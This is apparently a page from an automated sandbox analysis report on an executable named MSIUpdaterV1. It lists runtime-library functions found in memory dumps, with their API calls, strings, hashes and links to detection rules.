Function 0011B915 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0011B921
IsDebuggerPresent.KERNEL32 ref: 0011B9ED
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0011BA06
UnhandledExceptionFilter.KERNEL32(?), ref: 0011BA10

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 009e7caa16ea9716ecb6edabcfa9ea4c27f8341d74bce5abccdcb13222e4bf52
Instruction ID: ddd52bf606acd927d00ae88655ce7f293d070166a22099d0f6934e1023abff00
Opcode Fuzzy Hash: 009e7caa16ea9716ecb6edabcfa9ea4c27f8341d74bce5abccdcb13222e4bf52
Instruction Fuzzy Hash: 2331D8B5D052189BDB25DF64D9897CDBBB8AF08300F1041EAE50CAB290E7759AC5CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00115740 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0011574D
std::_Lockit::_Lockit.LIBCPMT ref: 00115767
std::_Lockit::~_Lockit.LIBCPMT ref: 00115788
std::_Lockit::~_Lockit.LIBCPMT ref: 001157B4
std::_Lockit::~_Lockit.LIBCPMT ref: 001157E9
std::_Lockit::_Lockit.LIBCPMT ref: 00115826
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00115877
__Getctype.LIBCPMT ref: 0011588E
std::_Facet_Register.LIBCPMT ref: 001158A7
std::_Lockit::~_Lockit.LIBCPMT ref: 001158C0

Strings

bad locale name, xrefs: 001158CF

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_GetctypeLocinfo::_Locinfo_ctorRegister
String ID: bad locale name
API String ID: 1407599034-1405518554
Opcode ID: 5494cea7376abb134a8422c2f60209bb8034c042ff36226fa0b486af7a1172a9
Instruction ID: 3ba31cae12d8309d30a9c103c6ae8e7cb36211bdd57518a3fc440f392facd541
Opcode Fuzzy Hash: 5494cea7376abb134a8422c2f60209bb8034c042ff36226fa0b486af7a1172a9
Instruction Fuzzy Hash: 88B1DF75A04A44CFC718DF68C880BAAB7F2BF85724F25426CE8549B391D731ED81CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00115AC0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00115ACD
std::_Lockit::_Lockit.LIBCPMT ref: 00115AE7
std::_Lockit::~_Lockit.LIBCPMT ref: 00115B08
std::_Lockit::~_Lockit.LIBCPMT ref: 00115B34
std::_Lockit::~_Lockit.LIBCPMT ref: 00115B69
std::_Lockit::_Lockit.LIBCPMT ref: 00115BA6
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00115BF7
std::_Facet_Register.LIBCPMT ref: 00115C16
std::_Lockit::~_Lockit.LIBCPMT ref: 00115C2F

Strings

bad locale name, xrefs: 00115C3E

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Locinfo::_Locinfo_ctorRegister
String ID: bad locale name
API String ID: 3434717313-1405518554
Opcode ID: d2161ed32e4e05610169b50c383728211d7622e2b74628f5bb96013eb0a6e853
Instruction ID: 4f650c3169b32dc1b75a09a77e810e80f3b9deb50dbaf9b8f8063b841457015f
Opcode Fuzzy Hash: d2161ed32e4e05610169b50c383728211d7622e2b74628f5bb96013eb0a6e853
Instruction Fuzzy Hash: 1741C0356087808FC719DF54D880BDABBF2AFA1720F05046DF849973A1D731E989CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00115C50 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00115C5D
std::_Lockit::_Lockit.LIBCPMT ref: 00115C77
std::_Lockit::~_Lockit.LIBCPMT ref: 00115C98
std::_Lockit::~_Lockit.LIBCPMT ref: 00115CC4
std::_Lockit::~_Lockit.LIBCPMT ref: 00115CF9
std::_Lockit::_Lockit.LIBCPMT ref: 00115D36
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00115D87
std::_Facet_Register.LIBCPMT ref: 00115DA6
std::_Lockit::~_Lockit.LIBCPMT ref: 00115DBF

Strings

bad locale name, xrefs: 00115DCE

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Locinfo::_Locinfo_ctorRegister
String ID: bad locale name
API String ID: 3434717313-1405518554
Opcode ID: 13f545cd5606272d81fc07fbd8ffddf1dbfa9c7b73a54010e41e91711f654a63
Instruction ID: 5b4ac7f6b6d38a10119b3b01b8f830d75f5bad7f3667e910bcea21f1ad77995a
Opcode Fuzzy Hash: 13f545cd5606272d81fc07fbd8ffddf1dbfa9c7b73a54010e41e91711f654a63
Instruction Fuzzy Hash: BD41C0355083808FC719DF54D840BDABBE5AFA1710F04046DF844973A1D771E985CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 00116D10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00116D20
std::_Lockit::_Lockit.LIBCPMT ref: 00116D3A
std::_Lockit::~_Lockit.LIBCPMT ref: 00116D5B
std::_Lockit::~_Lockit.LIBCPMT ref: 00116D8A
std::_Lockit::_Lockit.LIBCPMT ref: 00116DF1
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00116E4E
__Getctype.LIBCPMT ref: 00116E65
std::_Facet_Register.LIBCPMT ref: 00116EAA

Strings

bad locale name, xrefs: 00116EC4

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_$Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegister
String ID: bad locale name
API String ID: 2622896957-1405518554
Opcode ID: 17a902498077a60502cc60e5bb8fb9a6a6b3bde03fac2269362674e87ef51fe9
Instruction ID: 9dc3aea4d63f721e94b3de1617aaaacdd9daecb4162333f7092d5c48f2463f42
Opcode Fuzzy Hash: 17a902498077a60502cc60e5bb8fb9a6a6b3bde03fac2269362674e87ef51fe9
Instruction Fuzzy Hash: BD51F0355087808FD729DFA4D940B9AB7F0BFA5310F15496CE498973A2EB31E9C4CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0011E5A8 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMON

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0011E6C7
___TypeMatch.LIBVCRUNTIME ref: 0011E7D5
CatchIt.LIBVCRUNTIME ref: 0011E826
_UnwindNestedFrames.LIBCMT ref: 0011E927
CallUnexpected.LIBVCRUNTIME ref: 0011E942

Strings

csm, xrefs: 0011E652
csm, xrefs: 0011E5E5
csm, xrefs: 0011E6FE

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4119006552-393685449
Opcode ID: ba121b31ca22fa0783c8768df48bb6473f718b2c33e15124296dcf7cda03d755
Instruction ID: ea35486355a16d84b33e2afd1454422db39c491c7b873b2601524cf2a1b4c474
Opcode Fuzzy Hash: ba121b31ca22fa0783c8768df48bb6473f718b2c33e15124296dcf7cda03d755
Instruction Fuzzy Hash: F4B14371800219EBCF2DDFE4D9819EEBBF9BF24314B14406AEC116B252D731EA91CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00117360 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 158COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001173C1
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00117416
Concurrency::cancel_current_task.LIBCPMT ref: 0011758E

Strings

., xrefs: 001174E3
,, xrefs: 00117526
true, xrefs: 001174CC
bad locale name, xrefs: 00117584
false, xrefs: 001174B2

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: std::_$Concurrency::cancel_current_taskLocinfo::_Locinfo_ctorLockitLockit::_
String ID: ,$.$bad locale name$false$true
API String ID: 1995332507-3659324578
Opcode ID: 2a2c1f821fc47e2f9392963995998a20bfca8401081ffe1b3993b331ef1759be
Instruction ID: fafb1d8743e247f23c0079f120a2c269c48759d13fbd88d1f642b62b85f64cd0
Opcode Fuzzy Hash: 2a2c1f821fc47e2f9392963995998a20bfca8401081ffe1b3993b331ef1759be
Instruction Fuzzy Hash: EE515DB18083859ED715DF64C841BABB7F4BF95304F044A2DF98897281E775E688CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 001171D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 120COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00117222
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00117277
Concurrency::cancel_current_task.LIBCPMT ref: 00117341
Concurrency::cancel_current_task.LIBCPMT ref: 00117346
Concurrency::cancel_current_task.LIBCPMT ref: 0011734B

Strings

true, xrefs: 00117305
bad locale name, xrefs: 00117337
false, xrefs: 001172DF

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name$false$true
API String ID: 164343898-1062449267
Opcode ID: 526ca2cb09e930a7b5defe926033c0280e50f7d3fd47c4359a229e86d7157bb4
Instruction ID: 640608b21a5b5fc833e20bcf961d524772d8db18c5d397960c545ef371210ac6
Opcode Fuzzy Hash: 526ca2cb09e930a7b5defe926033c0280e50f7d3fd47c4359a229e86d7157bb4
Instruction Fuzzy Hash: 6941AD741083809EDB29DF64D84179ABBF0AFA4314F04483CF4999B3D2E7B5D589CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0017BBB6 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMON

Download Yara Rule

APIs

___TypeMatch.LIBVCRUNTIME ref: 0017BDE3
CatchIt.LIBVCRUNTIME ref: 0017BE34
_UnwindNestedFrames.LIBCMT ref: 0017BF35
CallUnexpected.LIBVCRUNTIME ref: 0017BF50

Strings

csm, xrefs: 0017BBF3
csm, xrefs: 0017BD0C
csm, xrefs: 0017BC60

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwind
String ID: csm$csm$csm
API String ID: 944608866-393685449
Opcode ID: 77ede89250e87a19d3ec329a0d723a5b0e6fd6c72b70439c046972efbda390e8
Instruction ID: f044861acb5b2b7e2928b986c4d63f3a754b068f411c68d9f7e097ae77336980
Opcode Fuzzy Hash: 77ede89250e87a19d3ec329a0d723a5b0e6fd6c72b70439c046972efbda390e8
Instruction Fuzzy Hash: A4B14A71808209DFCF29DFA4C881AAEBBB5FF14314F15C15AE9196B212DB31DA51CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0017BBB6 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMON

Download Yara Rule

APIs

___TypeMatch.LIBVCRUNTIME ref: 0017BDE3
CatchIt.LIBVCRUNTIME ref: 0017BE34
_UnwindNestedFrames.LIBCMT ref: 0017BF35
CallUnexpected.LIBVCRUNTIME ref: 0017BF50

Strings

csm, xrefs: 0017BBF3
csm, xrefs: 0017BC60
csm, xrefs: 0017BD0C

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwind
String ID: csm$csm$csm
API String ID: 944608866-393685449
Opcode ID: 77ede89250e87a19d3ec329a0d723a5b0e6fd6c72b70439c046972efbda390e8
Instruction ID: f044861acb5b2b7e2928b986c4d63f3a754b068f411c68d9f7e097ae77336980
Opcode Fuzzy Hash: 77ede89250e87a19d3ec329a0d723a5b0e6fd6c72b70439c046972efbda390e8
Instruction Fuzzy Hash: A4B14A71808209DFCF29DFA4C881AAEBBB5FF14314F15C15AE9196B212DB31DA51CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0012C877 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

, xrefs: 0012CAF0

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: b1accc73c0c26ddf5984fcba0ccf07e70e92609785dcc992ad6a1aee002b6fba
Instruction ID: 2925aed47d95c90caa0fefe6cfd037e1f95cf5e963a08dd30f0f2c31f40a3bf7
Opcode Fuzzy Hash: b1accc73c0c26ddf5984fcba0ccf07e70e92609785dcc992ad6a1aee002b6fba
Instruction Fuzzy Hash: 16B15874E04229AFDF15CF98E881BADBBB1FF56350F144149E604A7391D7708E62CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0018FF58 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0018FFDE

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 342c38b1b2dc153566cf6634e9eb19274f7e3938e841e5da1785daf43d75a014
Instruction ID: e0809107764ce56b8da60bad64b71b5dc74cd6b4ca75626f15acd9ac55bc8ce3
Opcode Fuzzy Hash: 342c38b1b2dc153566cf6634e9eb19274f7e3938e841e5da1785daf43d75a014
Instruction Fuzzy Hash: A7B14632E003559FDF16CF68CC92BAEBBA5EF69350F184165F945AB282D374E901C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0018FF58 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0018FFDE

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 342c38b1b2dc153566cf6634e9eb19274f7e3938e841e5da1785daf43d75a014
Instruction ID: e0809107764ce56b8da60bad64b71b5dc74cd6b4ca75626f15acd9ac55bc8ce3
Opcode Fuzzy Hash: 342c38b1b2dc153566cf6634e9eb19274f7e3938e841e5da1785daf43d75a014
Instruction Fuzzy Hash: A7B14632E003559FDF16CF68CC92BAEBBA5EF69350F184165F945AB282D374E901C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0017B6C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0017B6F7
___except_validate_context_record.LIBVCRUNTIME ref: 0017B6FF
_ValidateLocalCookies.LIBCMT ref: 0017B788
__IsNonwritableInCurrentImage.LIBCMT ref: 0017B7B3
_ValidateLocalCookies.LIBCMT ref: 0017B808

Strings

csm, xrefs: 0017B79D

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 10b403c9223d8456f41e9647b3308a77b0dee8f6ea00827e13fadc7f734673fd
Instruction ID: c8cf0ed3a2710dd8ce74829ec1219f610c4742339f57a6f53b488a16265532c1
Opcode Fuzzy Hash: 10b403c9223d8456f41e9647b3308a77b0dee8f6ea00827e13fadc7f734673fd
Instruction Fuzzy Hash: E8419034A042099BCF14DF68C8D5B9E7BF5AF54324F14C155F81CAB392D731AA15CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00187DF9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

@U, xrefs: 00187EC8
tU, xrefs: 00187EC1

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
